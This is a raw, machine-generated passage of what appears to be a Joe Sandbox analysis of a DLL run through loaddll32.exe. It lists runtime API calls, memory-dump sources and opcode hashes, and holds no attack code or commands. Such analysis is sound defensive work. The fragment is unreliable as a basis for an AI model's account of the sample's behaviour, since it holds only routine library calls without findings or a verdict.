                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • EnumSystemLocalesW.KERNEL32(6D41D741,00000001,00000000,?,?,6D41DFB4,|3Am,?,?,?,?,?,6D41337C,?,?,?), ref: 6D41D821
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2417226690-0
                                                                                                      • Opcode ID: 0c0c481fb0c9ed566c4af3c35e6bb4d74b59340cca28bac418ad5fc96d416601
                                                                                                      • Instruction ID: 904e60650ec44f7998c873e9a36cf3a65a301bac2f98235f4e9886ca31446928
                                                                                                      • Opcode Fuzzy Hash: 0c0c481fb0c9ed566c4af3c35e6bb4d74b59340cca28bac418ad5fc96d416601
                                                                                                      • Instruction Fuzzy Hash: 4CF0A07A30824657CB04AB35DD45A7ABBA4EBC1764B1A4059EE198B640C7319C43C7A0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 0-4108050209
                                                                                                      • Opcode ID: dd0aa1ed614b0a8bf40b50611dad1ec735aff16f5d9d4b7c4f468f230bbb6051
                                                                                                      • Instruction ID: 59ead4a6f0d260335f0f18a60e679652d620b637b2384e08e20b2e4ce3ea0e2c
                                                                                                      • Opcode Fuzzy Hash: dd0aa1ed614b0a8bf40b50611dad1ec735aff16f5d9d4b7c4f468f230bbb6051
                                                                                                      • Instruction Fuzzy Hash: 02513772688A0BD7DF118B788450FBF77A5AB43344F20463AD992C7381D715DD4683BA
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: c75a39d10d503a4da0036846f29441ea9708f901810258d97237c0dddc38a9d4
                                                                                                      • Instruction ID: db299f33bf81d416e9926ca9f0b1af4bd3b35d9ccafb574f974e1368b646ecea
                                                                                                      • Opcode Fuzzy Hash: c75a39d10d503a4da0036846f29441ea9708f901810258d97237c0dddc38a9d4
                                                                                                      • Instruction Fuzzy Hash: 5FA011302022008B8BA0AE3EC20A30A3AF8BA0A2803020028E008C2280EF30C8808A00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd

                                                                                                      Control-flow Graph (legend: Executed / Not Executed)
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 6D40D9F3
                                                                                                      • _free.LIBCMT ref: 6D40DA09
                                                                                                      • _free.LIBCMT ref: 6D40DA1A
                                                                                                      • _free.LIBCMT ref: 6D40DA2B
                                                                                                      • _free.LIBCMT ref: 6D40DA42
                                                                                                      • GetCPInfo.KERNEL32(?,?), ref: 6D40DA8A
                                                                                                        • Part of subcall function 6D415999: _free.LIBCMT ref: 6D415A04
                                                                                                      • _free.LIBCMT ref: 6D40DC61
                                                                                                      • _free.LIBCMT ref: 6D40DC74
                                                                                                      • _free.LIBCMT ref: 6D40DC82
                                                                                                      • _free.LIBCMT ref: 6D40DC8D
                                                                                                      • _free.LIBCMT ref: 6D40DCCF
                                                                                                      • _free.LIBCMT ref: 6D40DCD7
                                                                                                      • _free.LIBCMT ref: 6D40DCDF
                                                                                                      • _free.LIBCMT ref: 6D40DCE7
                                                                                                      • _free.LIBCMT ref: 6D40DCF5
                                                                                                        • Part of subcall function 6D415B4B: MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,6D424440,00000000,00000000,?,?,?,00000004,00000000,00000001,6D424440,0000007F,?,?), ref: 6D415B93
                                                                                                        • Part of subcall function 6D415B4B: __alloca_probe_16.LIBCMT ref: 6D415BBC
                                                                                                        • Part of subcall function 6D415B4B: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 6D415C08
                                                                                                        • Part of subcall function 6D415B4B: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D415C1A
                                                                                                        • Part of subcall function 6D415B4B: __freea.LIBCMT ref: 6D415C23
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _free$ByteCharMultiWide$InfoStringType__alloca_probe_16__freea
                                                                                                      • String ID: p6Bm
                                                                                                      • API String ID: 4259107651-2614220480

                                                                                                      Control-flow Graph (legend: Executed / Not Executed)
                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 6D41A9DA
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C14C
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C15E
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C170
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C182
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C194
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C1A6
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C1B8
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C1CA
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C1DC
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C1EE
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C200
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C212
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C224
                                                                                                      • _free.LIBCMT ref: 6D41A9CF
                                                                                                        • Part of subcall function 6D411902: HeapFree.KERNEL32(00000000,00000000,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?), ref: 6D411918
                                                                                                        • Part of subcall function 6D411902: GetLastError.KERNEL32(?,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?,?), ref: 6D41192A
                                                                                                      • _free.LIBCMT ref: 6D41A9F1
                                                                                                      • _free.LIBCMT ref: 6D41AA06
                                                                                                      • _free.LIBCMT ref: 6D41AA11
                                                                                                      • _free.LIBCMT ref: 6D41AA33
                                                                                                      • _free.LIBCMT ref: 6D41AA46
                                                                                                      • _free.LIBCMT ref: 6D41AA54
                                                                                                      • _free.LIBCMT ref: 6D41AA5F
                                                                                                      • _free.LIBCMT ref: 6D41AA97
                                                                                                      • _free.LIBCMT ref: 6D41AA9E
                                                                                                      • _free.LIBCMT ref: 6D41AABB
                                                                                                      • _free.LIBCMT ref: 6D41AAD3
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID:
                                                                                                      • API String ID: 161543041-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      APIs
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6D40AE0C
                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 6D40AE2E
                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 6D40AF3D
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6D40B00F
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 6D40B093
                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 6D40B0AE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                      • String ID: H$Bm$csm$csm$csm
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D404B3F
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D404B61
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D404B81
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6D404CEA
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D404D02
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 6D404D24
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 6D404D29
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 6D404D2E
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID: false$true
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 6D411E24
                                                                                                        • Part of subcall function 6D411902: HeapFree.KERNEL32(00000000,00000000,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?), ref: 6D411918
                                                                                                        • Part of subcall function 6D411902: GetLastError.KERNEL32(?,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?,?), ref: 6D41192A
                                                                                                      • _free.LIBCMT ref: 6D411E30
                                                                                                      • _free.LIBCMT ref: 6D411E3B
                                                                                                      • _free.LIBCMT ref: 6D411E46
                                                                                                      • _free.LIBCMT ref: 6D411E51
                                                                                                      • _free.LIBCMT ref: 6D411E5C
                                                                                                      • _free.LIBCMT ref: 6D411E67
                                                                                                      • _free.LIBCMT ref: 6D411E72
                                                                                                      • _free.LIBCMT ref: 6D411E7D
                                                                                                      • _free.LIBCMT ref: 6D411E8B
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • _free.LIBCMT ref: 6D413DA9
                                                                                                      • _free.LIBCMT ref: 6D413DC2
                                                                                                      • _free.LIBCMT ref: 6D413DF4
                                                                                                      • _free.LIBCMT ref: 6D413DFD
                                                                                                      • _free.LIBCMT ref: 6D413E09
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorLast
                                                                                                      • String ID: C$Eh@m$e/Am
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 6D40619F
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D4061A9
                                                                                                        • Part of subcall function 6D401BC0: std::_Lockit::_Lockit.LIBCPMT ref: 6D401BDD
                                                                                                        • Part of subcall function 6D401BC0: std::_Lockit::~_Lockit.LIBCPMT ref: 6D401BF9
                                                                                                      • codecvt.LIBCPMT ref: 6D4061E3
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6D4061FA
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D40621A
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 6D406227
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                      • String ID: Eh@m
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6D40CB2D,6D40CB2D,?,?,?,6D415E69,00000001,00000001,B8E85006), ref: 6D415CA9
                                                                                                      • __alloca_probe_16.LIBCMT ref: 6D415CD1
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,6D415E69,00000001,00000001,B8E85006,?,?,?), ref: 6D415D12
                                                                                                      • __alloca_probe_16.LIBCMT ref: 6D415D95
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,B8E85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 6D415DF2
                                                                                                      • __freea.LIBCMT ref: 6D415DFF
                                                                                                        • Part of subcall function 6D41193C: HeapAlloc.KERNEL32(00000000,?,?,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?,?), ref: 6D41196E
                                                                                                      • __freea.LIBCMT ref: 6D415E08
                                                                                                      • __freea.LIBCMT ref: 6D415E2D
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6D4077E1
                                                                                                      • __alloca_probe_16.LIBCMT ref: 6D40780D
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6D40784C
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D407869
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6D4078A8
                                                                                                      • __alloca_probe_16.LIBCMT ref: 6D4078C5
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D407907
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6D40792A
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                      • String ID:
                                                                                                      • API String ID: 2040435927-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _free_strpbrk
                                                                                                      • String ID: *?$.
                                                                                                      • API String ID: 3300345361-3972193922
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D41193C: HeapAlloc.KERNEL32(00000000,?,?,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?,?), ref: 6D41196E
                                                                                                      • _free.LIBCMT ref: 6D41371B
                                                                                                      • _free.LIBCMT ref: 6D413732
                                                                                                      • _free.LIBCMT ref: 6D413751
                                                                                                      • _free.LIBCMT ref: 6D41376C
                                                                                                      • _free.LIBCMT ref: 6D413783
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _free$AllocHeap
                                                                                                      • String ID: e/Am
                                                                                                      • API String ID: 1835388192-3301751377
                                                                                                      APIs
                                                                                                      • GetConsoleCP.KERNEL32(00000000,00000001,00000020,?,?,?,?,?,?,?,6D416A4D,00000008,00000001,00000020,0000002C,?), ref: 6D416303
                                                                                                      • __fassign.LIBCMT ref: 6D416382
                                                                                                      • __fassign.LIBCMT ref: 6D4163A1
                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000001,00000001,00000020,00000005,00000000,00000000), ref: 6D4163CE
                                                                                                      • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6D416A4D), ref: 6D4163EE
                                                                                                      • WriteFile.KERNEL32(?,00000008,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6D416A4D), ref: 6D416428
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 1324828854-0
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 0-537541572
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D41C86C: _free.LIBCMT ref: 6D41C891
                                                                                                      • _free.LIBCMT ref: 6D41CB70
                                                                                                        • Part of subcall function 6D411902: HeapFree.KERNEL32(00000000,00000000,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?), ref: 6D411918
                                                                                                        • Part of subcall function 6D411902: GetLastError.KERNEL32(?,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?,?), ref: 6D41192A
                                                                                                      • _free.LIBCMT ref: 6D41CB7B
                                                                                                      • _free.LIBCMT ref: 6D41CB86
                                                                                                      • _free.LIBCMT ref: 6D41CBDA
                                                                                                      • _free.LIBCMT ref: 6D41CBE5
                                                                                                      • _free.LIBCMT ref: 6D41CBF0
                                                                                                      • _free.LIBCMT ref: 6D41CBFB
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6D41030E,?,?,6D4102D6,?,00000000), ref: 6D41037D
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D410390
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,6D41030E,?,?,6D4102D6,?,00000000), ref: 6D4103B3
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$Eh@m$mscoree.dll
                                                                                                      • API String ID: 4061214504-490442398
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D404539
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D40455B
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D40457B
                                                                                                      • __Getctype.LIBCPMT ref: 6D404611
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6D404630
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D404648
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                      • String ID:
                                                                                                      • API String ID: 1102183713-0
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000001,?,6D40A8B2,6D407FE9,6D407B61,?,6D407D99,?,00000001,?,?,00000001,?,6D42E010,0000000C,6D407E92), ref: 6D40A9AF
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D40A9BD
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D40A9D6
                                                                                                      • SetLastError.KERNEL32(00000000,6D407D99,?,00000001,?,?,00000001,?,6D42E010,0000000C,6D407E92,?,00000001,?), ref: 6D40AA28
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID: Eh@m
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,6D40BB03,00000000,?,00000001,00000000,?,6D40BB7A,00000001,FlsFree,6D422EC0,6D422EC8,00000000), ref: 6D40BAD2
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID: api-ms-
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D4049E6
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D404A06
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D404A26
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6D404AC1
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D404AD9
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,6D424440,00000000,00000000,?,?,?,00000004,00000000,00000001,6D424440,0000007F,?,?), ref: 6D415B93
                                                                                                      • __alloca_probe_16.LIBCMT ref: 6D415BBC
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 6D415C08
                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D415C1A
                                                                                                      • __freea.LIBCMT ref: 6D415C23
                                                                                                        • Part of subcall function 6D41193C: HeapAlloc.KERNEL32(00000000,?,?,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?,?), ref: 6D41196E
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 6D41A687
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D41A6AA
                                                                                                        • Part of subcall function 6D41193C: HeapAlloc.KERNEL32(00000000,?,?,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?,?), ref: 6D41196E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6D41A6D0
                                                                                                      • _free.LIBCMT ref: 6D41A6E3
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D41A6F2
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,?,6D40DE2B,6D41197F,?,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?), ref: 6D4120A9
                                                                                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?,?), ref: 6D4120CF
                                                                                                      • _free.LIBCMT ref: 6D41210F
                                                                                                      • _free.LIBCMT ref: 6D412142
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 6D41214F
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                      • _free.LIBCMT ref: 6D411FB1
                                                                                                      • _free.LIBCMT ref: 6D411FE5
                                                                                                      • SetLastError.KERNEL32(00000000,00000000,?,0161F638,00000000), ref: 6D411FF2
                                                                                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 6D41C600
                                                                                                        • Part of subcall function 6D411902: HeapFree.KERNEL32(00000000,00000000,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?), ref: 6D411918
                                                                                                        • Part of subcall function 6D411902: GetLastError.KERNEL32(?,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?,?), ref: 6D41192A
                                                                                                      • _free.LIBCMT ref: 6D41C612
                                                                                                      • _free.LIBCMT ref: 6D41C624
                                                                                                      • _free.LIBCMT ref: 6D41C636
                                                                                                      • _free.LIBCMT ref: 6D41C648
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: r@m
                                                                                                      • API String ID: 0-373373960
                                                                                                      • Opcode ID: c934edff7b7b5a5998b747a36d051b53e8dd084f82369e8d7119a89086daed8e
                                                                                                      • Instruction ID: b3c885667bf9482054245bdd0bacd694d0d091dce5cebcd2f6551a260eba10ee
                                                                                                      • Opcode Fuzzy Hash: c934edff7b7b5a5998b747a36d051b53e8dd084f82369e8d7119a89086daed8e
                                                                                                      • Instruction Fuzzy Hash: 6361A071A1C11AABDB01DFA8CC40FFEB7B8AF4A358F118169DA10A7250D774DD058BE1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C:\Windows\system32\loaddll32.exe
                                                                                                      • API String ID: 0-1062229814
                                                                                                      • Opcode ID: aac2e9eed3ef5efb71aeedd581abadab590e0996f72cbf5cda67054d0830a92f
                                                                                                      • Instruction ID: 0ddfffde1c96a19fe75c2e81aa5dfff801a16d92a3b63d24639c1b500d3af68a
                                                                                                      • Opcode Fuzzy Hash: aac2e9eed3ef5efb71aeedd581abadab590e0996f72cbf5cda67054d0830a92f
                                                                                                      • Instruction Fuzzy Hash: 2F415075A0C229ABDB11DF9ECD80EBEBBB8FB85310B11416AE514A7240D7708E51CB90
                                                                                                      APIs
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6D40A76F
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6D40A823
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
